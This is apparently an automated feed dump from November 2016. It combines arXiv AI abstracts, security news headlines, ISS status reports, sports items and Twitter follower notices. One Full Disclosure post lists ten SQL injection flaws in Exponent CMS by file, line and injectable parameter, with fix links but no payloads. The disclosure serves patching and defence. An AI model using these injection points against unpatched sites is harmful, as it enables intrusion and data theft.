Planned experiments are the gold standard in reliably comparing the causal effect of switching from a baseline policy to a new policy. One critical shortcoming of classical experimental methods, however, is that they typically do not take into account the dynamic nature of response to policy changes. For instance, in an experiment where we seek to understand the effects of a new ad pricing policy on auction revenue, agents may adapt their bidding in response to the experimental pricing changes. Thus, causal effects of the new pricing policy after such adaptation period, the long-term causal effects, are not captured by the classical methodology even though they clearly are more indicative of the value of the new policy. Here, we formalize a framework to define and estimate long-term causal effects of policy changes in multiagent economies. Central to our approach is behavioral game theory, which we leverage to formulate the ignorability assumptions that are necessary for causal inference. Under such assumptions we estimate long-term causal effects through a latent space approach, where a behavioral model of how agents act conditional on their latent behaviors is combined with a temporal model of how behaviors evolve over time.



from cs.AI updates on arXiv.org http://ift.tt/1AK82il
via IFTTT

Surprising properties of dropout in deep networks. (arXiv:1602.04484v4 [cs.LG] UPDATED)

We analyze dropout in deep networks with rectified linear units and the quadratic loss. Our results expose surprising differences between the behavior of dropout and more traditional regularizers like weight decay. For example, on some simple data sets dropout training produces negative weights even though the output is the sum of the inputs. This provides a counterpoint to the suggestion that dropout discourages co-adaptation of weights. We also show that the dropout penalty can grow exponentially in the depth of the network while the weight-decay penalty remains essentially linear, and that dropout is insensitive to various re-scalings of the input features, outputs, and network weights. This last insensitivity implies that there are no isolated local minima of the dropout training criterion. Our work uncovers new properties of dropout, extends our understanding of why dropout succeeds, and lays the foundation for further progress.



from cs.AI updates on arXiv.org http://ift.tt/1KSFax2
via IFTTT

Analyzing Games with Ambiguous Player Types using the ${\rm MINthenMAX}$ Decision Model. (arXiv:1603.01524v3 [cs.GT] UPDATED)

In many common interactive scenarios, participants lack information about other participants, and specifically about the preferences of other participants. In this work, we model an extreme case of incomplete information, which we term games with type ambiguity, where a participant lacks even information enabling him to form a belief on the preferences of others. Under type ambiguity, one cannot analyze the scenario using the commonly used Bayesian framework, and therefore he needs to model the participants using a different decision model.

In this work, we present the ${\rm MINthenMAX}$ decision model under ambiguity. This model is a refinement of Wald's MiniMax principle, which we show to be too coarse for games with type ambiguity. We characterize ${\rm MINthenMAX}$ as the finest refinement of the MiniMax principle that satisfies three properties we claim are necessary for games with type ambiguity. This prior-less approach we present here also follows the common practice in computer science of worst-case analysis.

Finally, we define and analyze the corresponding equilibrium concept assuming all players follow ${\rm MINthenMAX}$. We demonstrate this equilibrium by applying it to two common economic scenarios: coordination games and bilateral trade. We show that in both scenarios, an equilibrium in pure strategies always exists and we analyze the equilibria.



from cs.AI updates on arXiv.org http://ift.tt/1LKDCWt
via IFTTT

DeepDGA: Adversarially-Tuned Domain Generation and Detection. (arXiv:1610.01969v1 [cs.CR] CROSS LISTED)

Many malware families utilize domain generation algorithms (DGAs) to establish command and control (C&C) connections. While there are many methods to pseudorandomly generate domains, we focus in this paper on detecting (and generating) domains on a per-domain basis which provides a simple and flexible means to detect known DGA families. Recent machine learning approaches to DGA detection have been successful on fairly simplistic DGAs, many of which produce names of fixed length. However, models trained on limited datasets are somewhat blind to new DGA variants.

In this paper, we leverage the concept of generative adversarial networks to construct a deep learning based DGA that is designed to intentionally bypass a deep learning based detector. In a series of adversarial rounds, the generator learns to generate domain names that are increasingly more difficult to detect. In turn, a detector model updates its parameters to compensate for the adversarially generated domains. We test the hypothesis of whether adversarially generated domains may be used to augment training sets in order to harden other machine learning models against yet-to-be-observed DGAs. We detail solutions to several challenges in training this character-based generative adversarial network (GAN). In particular, our deep learning architecture begins as a domain name auto-encoder (encoder + decoder) trained on domains in the Alexa one million. Then the encoder and decoder are reassembled competitively in a generative adversarial network (detector + generator), with novel neural architectures and training strategies to improve convergence.



from cs.AI updates on arXiv.org http://ift.tt/2f6yjm5
via IFTTT

Google Linking Anonymous Browser Tracking with Identifiable Tracking

Google Linking Anonymous Browser Tracking with Identifiable Tracking. Google's new ways to violate your privacy and -- more importantly -- how to ...

from Google Alert - anonymous http://ift.tt/2f6t45H
via IFTTT

Someone is Using Mirai Botnet to Shut Down Internet for an Entire Country

Someone is trying to take down the whole Internet of a country by launching massive distributed denial-of-service (DDoS) attacks using a botnet of insecure IoT devices infected by the Mirai malware. It all started early October when a cybercriminal publicly released the source code of Mirai – a piece of nasty IoT malware designed to scan for insecure IoT devices and enslave them into a botnet


from The Hacker News http://ift.tt/2f5Fgnd
via IFTTT

Ravens: Terrell Suggs tells his younger teammates about rivalry with the Steelers - "These games will define you" (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ravens: WR Steve Smith Sr. (ankle) in doubt for Sunday vs. Steelers after not practicing Thursday; out since Oct. 9 (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Limitations and Alternatives for the Evaluation of Large-scale Link Prediction. (arXiv:1611.00547v1 [cs.SI])

Link prediction, the problem of identifying missing links among a set of inter-related data entities, is a popular field of research due to its application to graph-like domains. Producing consistent evaluations of the performance of the many link prediction algorithms being proposed can be challenging due to variable graph properties, such as size and density. In this paper we first discuss traditional data mining solutions which are applicable to link prediction evaluation, arguing about their capacity for producing faithful and useful evaluations. We also introduce an innovative modification to a traditional evaluation methodology with the goal of adapting it to the problem of evaluating link prediction algorithms when applied to large graphs, by tackling the problem of class imbalance. We empirically evaluate the proposed methodology and, building on these findings, make a case for its importance on the evaluation of large-scale graph processing.



from cs.AI updates on arXiv.org http://ift.tt/2eBxf8V
via IFTTT

Chi d'amor non vuol le pene (Anonymous)

Chi d'amor non vuol le pene (Anonymous) ... Composer, Anonymous. Language, Italian. Piece Style, Baroque. Instrumentation, voice, continuo ...

from Google Alert - anonymous http://ift.tt/2ffJcEZ'amor_non_vuol_le_pene_(Anonymous)&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNETxFuDQtnN_2uvyrqHBwW__xSg4w
via IFTTT

ISS Daily Summary Report – 11/02/2016

Group Combustion Leak Check: CDR retrieved the Combustion Chamber from the Multi-Purpose Small Payload Rack (MSPR) Work Volume and installed a top plate on the Combustion Chamber. The crew then installed gas bottles and air supply lines to configure for a leak check. Ground specialists are focusing the leak check on the Group Combustion quick disconnect and seals. The Group Combustion investigation tests a theory that fuel sprays change from partial to group combustion as flames spread across a cloud of droplets. In the Multi-purpose Small Payload Rack in the Kibo module, droplets of decane, a component of gasoline or kerosene, are arranged randomly on thin-fiber lattice points, and the flame and droplet positions and temperature distribution are measured as the flame spreads. Microgravity blocks convection, which on Earth would quickly disperse the droplets and combustion products before such measurements could be made.

Veg-03 Operations: Today, CDR thinned out the plants in the Veggie facility to promote growth of the larger plants. The crew then watered the plant pillows. The overall goal of Veg-03 is to further demonstrate proof-of-concept for the Veggie plant growth chamber and the planting pillows using ‘Outredgeous’ Red Romaine lettuce. Future long-duration missions into the solar system will require a fresh food supply to supplement crew diets, which means growing crops in space. Previous investigations focused on improving productivity in controlled environments, but the limited quarters of the space shuttle and ISS made it difficult to conduct large-scale crop production tests. Veg-03 expands on previous validation tests of the new Veggie hardware, which crew members will soon use to grow cabbage, lettuce and other fresh vegetables in space. Tests determine which types of microorganisms are present in space-grown cabbage, providing baseline data for future crop-growing efforts. Behavioral health surveys assess the impact of growing plants on crew morale and mood.

Meteor Operations: CDR changed out the hard drive and diffraction grating on the Meteor camera located in the Window Observational Research Facility (WORF). The Meteor payload is a visible spectroscopy instrument with the primary purpose of observing meteors in Earth orbit. Meteor uses image analysis to provide information on the physical and chemical properties of the meteoroid dust, such as size, density, and chemical composition. Since the parent comets or asteroids for most of the meteor showers are identified, the study of the meteoroid dust on orbit provides information about the parent comets and asteroids.

Reboost: Last night the ISS performed a reboost using the SM main engines. The purpose of the reboost was to finalize the planned conditions for the upcoming launches of 49S on 17-November 17 and 65P on 01-December.

Today’s Planned Activities
All activities were completed unless otherwise noted.

Combustion Integrated Rack Alignment Guide Removal ALGOMETRIYA. Pressure and Thermal Algometry preparation for and measurement session Regeneration of Micropurification Unit (БМП) Ф1 Cartridge (start) Meteor Shutter Open Public Affairs Office (PAO) High Definition (HD) Config LAB Setup XF305 Camcorder Setup Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Retrieval. Crew Prep for PAO TV-Conference with the Participants of the Russian Engineering Festival OTKLIK. Hardware Monitoring On-orbit hearing assessment using EARQ 24-hour ECG Recording (start) Combustion Chamber (CC) Top Plate Attachment Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Installation CONTURE-2. Installation of SW on RSK2 Laptop for Conture-2 Experiment on the RS. 24-hour Blood Pressure Recording (start) CONTURE-2. Experiment (Session 1). Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Leak Trouble Shoot part 2 On-Orbit Hearing Assessment (O-OHA) with EarQ Software Setup and Test Exercise Data Downlink via OCA CONTURE-2 Experiment (Session 2). Health Maintenance System (HMS) Periodic Health Status (PHS) Photo/TV Camcorder Setup Verification VEG-03 Plant Thin VEG-03 Plant Pillow Prime. CONTURE-2. De-installation of master arm with adapter from panel 418 ISS Crew Orientation Crew time for ISS adaptation and orientation ALGOMETRIYA. Pressure Algometry Measurement Ops Familiarization with Auxiliary Computer System Manufacturing Device Print Removal, Clean and Stow Crew time for ISS adaptation and orientation Filling (separation) of ЕДВ (КОВ) for Elektron or ЕДВ-СВ. Fill ЕДВ (КОВ) No.1242 from ЕДВ No.1233 METEOR Grating Configuration Public Affairs Office (PAO) High Definition (HD) Config LAB Setup СОЖ maintenance PAO Preparation Public Affairs Office (PAO) Event in High Definition (HD) – Lab INTERACTION-2. Experiment Ops. Video Footage of Greetings Photo/TV Camcorder Setup Verification Advanced Resistive Exercise Device (ARED) Exercise Video Stow ALGOMETRIYA. Pressure and Thermal Algometry Measurement Session. Closeout Ops Regeneration Micropurification Unit (БМП) Ф1 Absorption Cartridge (end)

Completed Task List Items
None

Ground Activities
All activities were completed unless otherwise noted.

SSRMS Power Up and Maneuver to Park Position P4 IEA Survey

Three-Day Look Ahead:
Thursday, 11/04: Cygnus cargo transfer, HRF blood collection setup
Friday, 11/05: HRF centrifuge setup & blood collection/stow, Recycle tank drain to EDV, Cygnus cargo transfer
Saturday, 11/06: Weekly Housekeeping

QUICK ISS Status – Environmental Control Group:

Component: Status
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): Off
[СКВ] 2 – SM Air Conditioner System (“SKV2”): On
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Operate
Major Constituent Analyzer (MCA) Node 3: Idle
Oxygen Generation Assembly (OGA): Shutdown
Urine Processing Assembly (UPA): Standby
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/2ehTLma
via IFTTT

Hundreds Of Operations Canceled After Malware Hacks Hospitals Systems

Computer viruses do not discriminate. They are not just hacking your email and online banking accounts anymore. Computer viruses do not distinguish between a personal computer and a hospital machine delivering therapy to patients — and the results could prove deadly. Cyber attacks on hospitals have emerged as a significant cyber security risk in 2016, which not only threaten highly sensitive


from The Hacker News http://ift.tt/2eXHg3c
via IFTTT

Anonymous user f578cd

Name, Anonymous user f578cd. User since, November 2, 2016. Number of add-ons developed, 1 theme. Average rating of developer's add-ons, Not ...

from Google Alert - anonymous http://ift.tt/2eXGMKF
via IFTTT

Critical Flaws in MySQL Give Hackers Root Access to Server (Exploits Released)

Over a month ago we reported about two critical zero-day vulnerabilities in the world's 2nd most popular database management software MySQL:

MySQL Remote Root Code Execution (CVE-2016-6662)
Privilege Escalation (CVE-2016-6663)

At that time, Polish security researcher Dawid Golunski of Legal Hackers who discovered these vulnerabilities published technical details and proof-of-concept exploit


from The Hacker News http://ift.tt/2ff1gws
via IFTTT

Is it possible for people taking my jotform survey to remain anonymous?

Is it possible when using jotform to have the survey's participants return their surveys anonymously? Thank you in advance for your help. Tryn Collins.

from Google Alert - anonymous http://ift.tt/2egqkkL
via IFTTT

Anonymous And Met Police In Fierce War Of Words Over Million Mask March

PA Police in London have hit back at Anonymous UK's claims they are guilty of “pitiful aggression and violence” ahead of a potentially huge Million ...

from Google Alert - anonymous http://ift.tt/2fGK5ag
via IFTTT

I have a new follower on Twitter


Spiral.ac
Challenge every student! Spiral provides FREE tools for classroom-based collaborative learning with 1:1 devices. Get it here: https://t.co/BtlYquZ8DY
London
https://t.co/jhg8OifGTz
Following: 1745 - Followers: 2404

November 03, 2016 at 01:59AM via Twitter http://twitter.com/SpiralEducation

Yearly Arctic Sea Ice Age with Graph of Ice Age by Area: 1984 - 2016

One significant change in the Arctic region in recent years has been the rapid decline in perennial sea ice. Perennial sea ice, also known as multi-year ice, is the portion of the sea ice that survives the summer melt season. Perennial ice may have a life-span of nine years or more and represents the thickest component of the sea ice; perennial ice can grow up to four meters thick. By contrast, first year ice that grows during a single winter is generally at most two meters thick. This animation shows the Arctic sea ice age for the week of the minimum ice extent for each year, depicting the age in different colors. Younger sea ice, or first-year ice, is shown in a dark shade of blue while the ice that is four years old or older is shown as white. A color scale identifies the age of the intermediary years. Correction: The original release on 10/28/2016 incorrectly labeled the oldest category on the graph as "5+". This was corrected to read "4+" on 10/30/2016.

from NASA's Scientific Visualization Studio: Most Popular
via IFTTT

Wednesday, November 2, 2016

I have a new follower on Twitter


Josh Luke
Gen X dude who wears socks with sandals. CEO, Healthcare futurist, #Alzheimers champ, #readmission guru, Family man, Author, Speaker. Enjoy hairbands & baseball
So Cal - USC Faculty
https://t.co/tN62ro9eWL
Following: 6582 - Followers: 6444

November 02, 2016 at 09:59PM via Twitter http://twitter.com/JoshLuke4Health

Bots as Virtual Confederates: Design and Ethics. (arXiv:1611.00447v1 [cs.CY])

The use of bots as virtual confederates in online field experiments holds extreme promise as a new methodological tool in computational social science. However, this potential tool comes with inherent ethical challenges. Informed consent can be difficult to obtain in many cases, and the use of confederates necessarily implies the use of deception. In this work we outline a design space for bots as virtual confederates, and we propose a set of guidelines for meeting the status quo for ethical experimentation. We draw upon examples from prior work in the CSCW community and the broader social science literature for illustration. While a handful of prior researchers have used bots in online experimentation, our work is meant to inspire future work in this area and raise awareness of the associated ethical issues.



from cs.AI updates on arXiv.org http://ift.tt/2fekWk5
via IFTTT

Natural-Parameter Networks: A Class of Probabilistic Neural Networks. (arXiv:1611.00448v1 [cs.LG])

Neural networks (NN) have achieved state-of-the-art performance in various applications. Unfortunately in applications where training data is insufficient, they are often prone to overfitting. One effective way to alleviate this problem is to exploit the Bayesian approach by using Bayesian neural networks (BNN). Another shortcoming of NN is the lack of flexibility to customize different distributions for the weights and neurons according to the data, as is often done in probabilistic graphical models. To address these problems, we propose a class of probabilistic neural networks, dubbed natural-parameter networks (NPN), as a novel and lightweight Bayesian treatment of NN. NPN allows the usage of arbitrary exponential-family distributions to model the weights and neurons. Different from traditional NN and BNN, NPN takes distributions as input and goes through layers of transformation before producing distributions to match the target output distributions. As a Bayesian treatment, efficient backpropagation (BP) is performed to learn the natural parameters for the distributions over both the weights and neurons. The output distributions of each layer, as byproducts, may be used as second-order representations for the associated tasks such as link prediction. Experiments on real-world datasets show that NPN can achieve state-of-the-art performance.



from cs.AI updates on arXiv.org http://ift.tt/2fjlW5p
via IFTTT

Collaborative Recurrent Autoencoder: Recommend while Learning to Fill in the Blanks. (arXiv:1611.00454v1 [cs.LG])

Hybrid methods that utilize both content and rating information are commonly used in many recommender systems. However, most of them use either handcrafted features or the bag-of-words representation as a surrogate for the content information but they are neither effective nor natural enough. To address this problem, we develop a collaborative recurrent autoencoder (CRAE) which is a denoising recurrent autoencoder (DRAE) that models the generation of content sequences in the collaborative filtering (CF) setting. The model generalizes recent advances in recurrent deep learning from i.i.d. input to non-i.i.d. (CF-based) input and provides a new denoising scheme along with a novel learnable pooling scheme for the recurrent autoencoder. To do this, we first develop a hierarchical Bayesian model for the DRAE and then generalize it to the CF setting. The synergy between denoising and CF enables CRAE to make accurate recommendations while learning to fill in the blanks in sequences. Experiments on real-world datasets from different domains (CiteULike and Netflix) show that, by jointly modeling the order-aware generation of sequences for the content information and performing CF for the ratings, CRAE is able to significantly outperform the state of the art on both the recommendation task based on ratings and the sequence generation task based on content information.



from cs.AI updates on arXiv.org http://ift.tt/2fggeCJ
via IFTTT

An application of incomplete pairwise comparison matrices for ranking top tennis players. (arXiv:1611.00538v1 [cs.AI])

Pairwise comparison is an important tool in multi-attribute decision making. Pairwise comparison matrices (PCM) have been applied for ranking criteria and for scoring alternatives according to a given criterion. Our paper presents a special application of incomplete PCMs: ranking of professional tennis players based on their results against each other. The selected 25 players have been on the top of the ATP rankings for a shorter or longer period in the last 40 years. Some of them have never met on the court. One of the aims of the paper is to provide ranking of the selected players, however, the analysis of incomplete pairwise comparison matrices is also in the focus. The eigenvector method and the logarithmic least squares method were used to calculate weights from incomplete PCMs. In our results the top three players of four decades were Nadal, Federer and Sampras. Some questions have been raised on the properties of incomplete PCMs and remain open for further investigation.



from cs.AI updates on arXiv.org http://ift.tt/2feiVEn
via IFTTT

Inferring Coupling of Distributed Dynamical Systems via Transfer Entropy. (arXiv:1611.00549v1 [cs.AI])

In this work, we are interested in structure learning for a set of spatially distributed dynamical systems, where individual subsystems are coupled via latent variables and observed through a filter. We represent this model as a directed acyclic graph (DAG) that characterises the unidirectional coupling between subsystems. Standard approaches to structure learning are not applicable in this framework due to the hidden variables, however we can exploit the properties of certain dynamical systems to formulate exact methods based on state space reconstruction. We approach the problem by using reconstruction theorems to analytically derive a tractable expression for the KL-divergence of a candidate DAG from the observed dataset. We show this measure can be decomposed as a function of two information-theoretic measures, transfer entropy and stochastic interaction. We then present two mathematically robust scoring functions based on transfer entropy and statistical independence tests. These results support the previously held conjecture that transfer entropy can be used to infer effective connectivity in complex networks.



from cs.AI updates on arXiv.org http://ift.tt/2fx3YBf
via IFTTT

Strong Neutrosophic Graphs and Subgraph Topological Subspaces. (arXiv:1611.00576v1 [cs.AI])

In this book the authors for the first time introduce the notion of strong neutrosophic graphs. They are very different from the usual graphs and neutrosophic graphs. Using these new structures special subgraph topological spaces are defined. Further special lattice graphs of subgraphs of these graphs are defined and described. Several interesting properties using subgraphs of a strong neutrosophic graph are obtained. Several open conjectures are proposed. This new class of strong neutrosophic graphs will certainly find applications in Neutrosophic Cognitive Maps (NCM), Neutrosophic Relational Maps (NRM) and Neutrosophic Relational Equations (NRE) with appropriate modifications.



from cs.AI updates on arXiv.org http://ift.tt/2fegcLm
via IFTTT

The new hybrid COAW method for solving multi-objective problems. (arXiv:1611.00577v1 [cs.NE])

In this article, using the Cuckoo Optimization Algorithm and the simple additive weighting method, the hybrid COAW algorithm is presented to solve multi-objective problems. The Cuckoo algorithm is an efficient and structured method for solving nonlinear continuous problems. The created Pareto frontiers of the COAW proposed algorithm are exact and have good dispersion. This method has a high speed in finding the Pareto frontiers and identifies the beginning and end points of Pareto frontiers properly. In order to validate the proposed algorithm, several experimental problems were analyzed, the results of which indicate the proper effectiveness of the COAW algorithm for solving multi-objective problems.



from cs.AI updates on arXiv.org http://ift.tt/2fx3Wt7
via IFTTT

TorchCraft: a Library for Machine Learning Research on Real-Time Strategy Games. (arXiv:1611.00625v1 [cs.LG])

We present TorchCraft, an open-source library that enables deep learning research on Real-Time Strategy (RTS) games such as StarCraft: Brood War, by making it easier to control these games from a machine learning framework, here Torch. This white paper argues for using RTS games as a benchmark for AI research, and describes the design and components of TorchCraft.



from cs.AI updates on arXiv.org http://ift.tt/2fegd1Q
via IFTTT

A Framework for Searching for General Artificial Intelligence. (arXiv:1611.00685v1 [cs.AI])

There is a significant lack of unified approaches to building generally intelligent machines. The majority of current artificial intelligence research operates within a very narrow field of focus, frequently without considering the importance of the 'big picture'. In this document, we seek to describe and unify principles that guide the basis of our development of general artificial intelligence. These principles revolve around the idea that intelligence is a tool for searching for general solutions to problems. We define intelligence as the ability to acquire skills that narrow this search, diversify it and help steer it to more promising areas. We also provide suggestions for studying, measuring, and testing the various skills and abilities that a human-level intelligent machine needs to acquire. The document aims to be both implementation agnostic, and to provide an analytic, systematic, and scalable way to generate hypotheses that we believe are needed to meet the necessary conditions in the search for general artificial intelligence. We believe that such a framework is an important stepping stone for bringing together definitions, highlighting open problems, connecting researchers willing to collaborate, and for unifying the arguably most significant search of this century.



from cs.AI updates on arXiv.org http://ift.tt/2fwXYbS
via IFTTT

Extensions and Limitations of the Neural GPU. (arXiv:1611.00736v1 [cs.NE])

The Neural GPU is a recent model that can learn algorithms such as multi-digit binary addition and binary multiplication in a way that generalizes to inputs of arbitrary length. We show that there are two simple ways of improving the performance of the Neural GPU: by carefully designing a curriculum, and by increasing model size. The latter requires careful memory management, as a naive implementation of the Neural GPU is memory intensive. We find that these techniques increase the set of algorithmic problems that can be solved by the Neural GPU: we have been able to learn to perform all the arithmetic operations (and generalize to arbitrarily long numbers) when the arguments are given in the decimal representation (which, surprisingly, has not been possible before). We have also been able to train the Neural GPU to evaluate long arithmetic expressions with multiple operands that require respecting the precedence order of the operands, although these have succeeded only in their binary representation, and not with 100% accuracy.

In addition, we attempt to gain insight into the Neural GPU by understanding its failure modes. We find that Neural GPUs that correctly generalize to arbitrarily long numbers still fail to compute the correct answer on highly-symmetric, atypical inputs: for example, a Neural GPU that achieves near-perfect generalization on decimal multiplication of up to 100-digit long numbers can fail on $000000\dots002 \times 000000\dots002$ while succeeding at $2 \times 2$. These failure modes are reminiscent of adversarial examples.



from cs.AI updates on arXiv.org http://ift.tt/2fek8LZ
via IFTTT

Building Machines That Learn and Think Like People. (arXiv:1604.00289v3 [cs.AI] UPDATED)

Recent progress in artificial intelligence (AI) has renewed interest in building systems that learn and think like people. Many advances have come from using deep neural networks trained end-to-end in tasks such as object recognition, video games, and board games, achieving performance that equals or even beats humans in some respects. Despite their biological inspiration and performance achievements, these systems differ from human intelligence in crucial ways. We review progress in cognitive science suggesting that truly human-like learning and thinking machines will have to reach beyond current engineering trends in both what they learn, and how they learn it. Specifically, we argue that these machines should (a) build causal models of the world that support explanation and understanding, rather than merely solving pattern recognition problems; (b) ground learning in intuitive theories of physics and psychology, to support and enrich the knowledge that is learned; and (c) harness compositionality and learning-to-learn to rapidly acquire and generalize knowledge to new tasks and situations. We suggest concrete challenges and promising routes towards these goals that can combine the strengths of recent neural network advances with more structured cognitive models.



from cs.AI updates on arXiv.org http://ift.tt/223IhEY
via IFTTT

Know Your Anonymous Audience

Know Your Anonymous Audience. More interaction and involvement versus a traditional lecture. CHALLENGE Steven Milligan M.D. is a faculty ...

from Google Alert - anonymous http://ift.tt/2eeOBHJ
via IFTTT

I have a new follower on Twitter


Jason Reid
Jason M. Reid, Esq. Board Certified Criminal Trial Expert, DUI attorney, injury attorney, and amateur sportswriter.
Bradenton, FL
http://t.co/ZLyDU8mBFz
Following: 12968 - Followers: 14474

November 02, 2016 at 01:44PM via Twitter http://twitter.com/attysportwriter

19-Year-Old Teenage Hacker Behind DDoS-for-Hire Service Pleads Guilty

Due to the worldwide promotion of Mirai botnet that knocked down half of the Internet last Friday, hackers and even script kiddies have started creating their own botnet networks by hacking millions of IoT devices and selling them as DDoS-for-hire service to overwhelm targets with data. A 19-year-old student from Hertford has pled guilty to running one such DDoS-for-hire service that shortly


from The Hacker News http://ift.tt/2fEJ6XX
via IFTTT

Ravens: WR Steve Smith (ankle), LB Elvis Dumervil (foot) not practicing Wednesday; LB C.J. Mosley (hamstring) returns (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] Disclose [10 * cve] in Exponent CMS

Disclose 10 * cve in Exponent CMS

[CVE-2016-7780]
> In the line 42 of cron/find_help.php, $_GET['version'] can be
> controlled and injected. It is possible to time-based blind SQL Inject
> by the param of "version".
fix: http://ift.tt/2f1bIr0

[CVE-2016-7781]
> In the line 387 function getUserByName of
> ./framework/modules/users/models/user.php, $name can be controlled and
> injected. It is possible to time-based blind SQL Inject by the param of
> "author".
fix: In the line 169 of framework/modules/blog/controllers/blogController.php, $this->params['author'] has been escaped. http://ift.tt/2fbnFNP

[CVE-2016-7782]
> In the line 33 of ./framework/core/models/expConfig.php,
> $this->location_data can be controlled and injected. It is possible to
> time-based blind SQL Inject by the param of "src".
fix: http://ift.tt/2fi0dut

[CVE-2016-7783]
> In the line 118 of ./framework/core/models/expRecord.php, $params can
> be controlled and injected. It is possible to boolean-based and
> time-based blind SQL Inject by the param of "title".
fix: http://ift.tt/2enNs43

[CVE-2016-7784]
> This bug was found in the framework/core/subsystems/expRouter.php
> It is possible to inject SQL code in the function getSection by
> $_REQUEST['section'].
fix: http://ift.tt/2fhXOQH

[CVE-2016-7788]
> In Exponent CMS <=2.3.9, In the line 74 of ./framework/modules/users/models/user.php, $username
> can be controlled and injected. It is possible to time-based blind SQL
> Inject by the param of "username".
fix: In the line 127 of file framework/modules/users/controllers/loginController.php. http://ift.tt/2fbnFNP

[CVE-2016-7789]
> In Exponent CMS <=2.3.9, framework/modules/eaas/controllers/eaasController.php, $key can be
> controlled. And in the line 33 of framework/core/models/expConfig.php,
> $this->location_data can be controlled and injected. It is possible to
> boolean-based blind SQL Inject by the param of apikey.
fix: http://ift.tt/2fi0dut

[CVE-2016-9019]
> In Exponent CMS <=2.3.9, in the function activate_address of the file
> framework/modules/addressbook/controllers/addressController.php,
> $this->params['is_what'] can be controlled and injected. It is possible
> to do time-based SQL inject by the param 'is_what'.
fix: http://ift.tt/2fi0dut

[CVE-2016-9020]
> In exponentcms <=2.3.9, in the line 125 of file
> framework/modules/help/controllers/helpController.php,
> $this->params['version'] can be controlled and injected. it is possible
> to SQL injection by the param of 'version'.
Fix: In the line 55 of framework/modules/help/models/help_version.php, $version has been escaped by function expString::escape. http://ift.tt/2fbnFNP

[CVE-2016-9087]
> In exponentcms <=2.3.9, in the line 94 of file
> framework/modules/filedownloads/controllers/filedownloadController.php,
> $this->param['fileid'] can be controlled and injected. It is possible
> to SQL inject by param fileid.
Fix: In the line 94 of file framework/modules/filedownloads/controllers/filedownloadController.php, $this->params['fileid'] has been escaped by function expString::escape. http://ift.tt/2fbnFNP

Reported By web-Obfuscator in dbappsecurity

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Multiple SQL injection vulnerabilities in dotCMS (8x CVE)

[FD] MSIE 11 MSHTML CView::CalculateImageImmunity use-after-free details

Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the second entry in that series. The below information is also available on my blog at http://ift.tt/2fhXQI9. There you can find a repro that triggered this issue in addition to the information below.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

MSIE 11 MSHTML CView::CalculateImageImmunity UAF
================================================
(The fix and CVE number for this bug are not known)

Synopsis

Source: Gmail -> IFTTT-> Blogger

Anonymous Mouse

See what kind of products Anonymous Mouse () likes on Product Hunt.

from Google Alert - anonymous http://ift.tt/2e2dr2q
via IFTTT

I have a new follower on Twitter


Michael Semer
Providing #Branding | #ContentMarketing | #ContentWriting | #Copywriting | #InboundMarketing | #MarketingStrategy and more for agencies and brands alike.
Casa de Kiki, BevHills, CA
http://t.co/f0QdjbdlbH
Following: 4772 - Followers: 5007

November 02, 2016 at 10:54AM via Twitter http://twitter.com/michaelsemer

FSHISD rolls out new anonymous alerts tool

The Fort Sam Houston Independent School District has introduced a new communications tool called Anonymous Alerts®. The Anonymous Alerts ...

from Google Alert - anonymous http://ift.tt/2fcDMb8
via IFTTT

ISS Daily Summary Report – 11/01/2016

Extravehicular Mobility Unit (EMU) Maintenance: The crew performed a half water dump and fill on EMU 3006 feedwater tanks and a full water dump and refill of EMUs 3003 and 3010 feedwater tanks. These activities satisfy maintenance requirements for on-orbit stowage of the EMUs.

Urine Processing Assembly (UPA): Last week, the crew demated the connection between the Fluid Control and Pump Assembly (FCPA) at Quick Disconnect (QD) 27 on the Pressure Control and Pump Assembly (PCPA) and performed a PCPA Remove & Replace (R&R). Today the crew re-mated QD27 to the new PCPA. Re-mating QD 27 will allow the FCPA pressure to be pumped down to a functional range and the Fault Detection Isolation and Recovery (FDIR) limit for the pressure sensor will be re-set to its nominal value post re-mate.

Oxygen Generation Assembly (OGA) Hydrogen (H2) On-Orbit Replacement Unit (ORU) Cell #1: Over the last few days, system experts discovered that Cell #1 voltage drop is becoming more severe than what was noticed previously. Per engineering team recommendation and Program concurrence, on Saturday the OGA was shut down due to OGA contamination and Cell #1 degradation. The team will further investigate whether to continue operating OGA with degraded Cell #1 or replace it with a suspect on-orbit H2 ORU.

Cygnus Cargo Operations: Today, the crew performed 30 minutes of Cygnus Cargo Operations from the Task List. With this time, the crew has completed 10 hours of Cygnus Cargo Operations. Ground teams estimate 19 hours of Cygnus cargo operations remain.

Today’s Planned Activities
All activities were completed unless otherwise noted.
Total Organic Carbon Analyzer (TOCA) Water Recovery System (WRS) Sample Analysis Intravehicular Tissue Equivalent Proportional Counter (IV-TEPC) Relocate Meteor Shutter Open On-Orbit Hearing Assessment (O-OHA) with EarQ Software Setup and Test Regenerative Environmental Control and Life Support System (RGN) WSTA Fill ISS Crew Orientation Dose Tracker Data Entry Subject Total Organic Carbon Analyzer (TOCA) Sample Data Record Cygnus Cargo Operations Conference EDV (KOV) Separation for Elektron and ГЖС Flushing Regenerative Environmental Control and Life Support System (RGN) WSTA Fill Extravehicular Mobility Unit (EMU) Full Water Tank Dump and Fill СОЖ maintenance Extravehicular Mobility Unit (EMU) Swap Extravehicular Mobility Unit (EMU) Full Water Tank Dump and Fill Photo T/V (P/TV) Advanced Resistive Exercise Device (ARED) Exercise Video Setup CONTUR-2. P/L Assembly Setup on panel 418 Urine Processor Assembly (UPA) QD27 Remate Closing Window Shutters 6, 8, 9, 12, 13, 14 USOS Window Shutter Close

Completed Task List Items
